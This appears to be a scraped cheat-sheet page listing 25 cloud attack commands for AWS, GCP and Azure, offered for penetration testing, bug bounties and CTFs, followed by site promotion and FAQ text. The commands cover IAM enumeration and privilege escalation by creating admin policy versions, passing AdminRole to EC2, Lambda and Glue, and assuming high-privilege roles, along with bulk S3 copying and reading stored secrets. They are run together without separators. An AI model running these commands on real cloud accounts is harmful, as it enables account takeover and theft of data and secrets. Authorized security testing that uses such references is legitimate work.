Cloud security testing for AWS, GCP, and Azure — credential enumeration, privilege escalation paths, lateral movement, and service-specific attack techniques. (25 payloads)
aws sts get-caller-identityaws iam list-attached-user-policies --user-name <user>aws iam list-groups-for-user --user-name <user>python3 enumerate-iam.py --access-key AKIA... --secret-key ...pacuaws iam create-policy-version --policy-arn <arn> --policy-document file://admin.json --set-as-defaultaws ec2 run-instances --iam-instance-profile Name=AdminRole --image-id ami-xxx --instance-type t2.microaws lambda create-function --function-name privesc --role arn:aws:iam::ACCT:role/AdminRole ...aws sts assume-role --role-arn arn:aws:iam::ACCT:role/HighPrivRole --role-session-name pwnaws glue create-dev-endpoint --endpoint-name pwn --role-arn arn:aws:iam::ACCT:role/AdminRoleaws s3 lsaws s3 cp s3://bucket/ . --recursiveaws ec2 describe-instances --query 'Reservations[].Instances[].[InstanceId,PublicIpAddress,Tags]'aws secretsmanager list-secretsaws secretsmanager get-secret-value --secret-id <name>gcloud auth listgcloud projects listgcloud iam service-accounts listgcloud compute instances listgcloud storage lsaz account listaz vm list -o tableaz keyvault listaz storage account listaz role assignment list --allLevel up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides
It's a quick-reference collection of 25 Cloud payloads for testing Cloud Security vulnerabilities during authorized penetration testing, bug bounties, and CTFs. Every payload is copy-ready and grouped by attack context.
Copy any payload straight into your authorized test, or open the Cloud Infrastructure generator to build customized Cloud variants with encoding and WAF-bypass options. Only test systems you have explicit permission to assess.
Yes — this cheat sheet and all Cloud payloads are completely free, with no account required. Everything runs in your browser.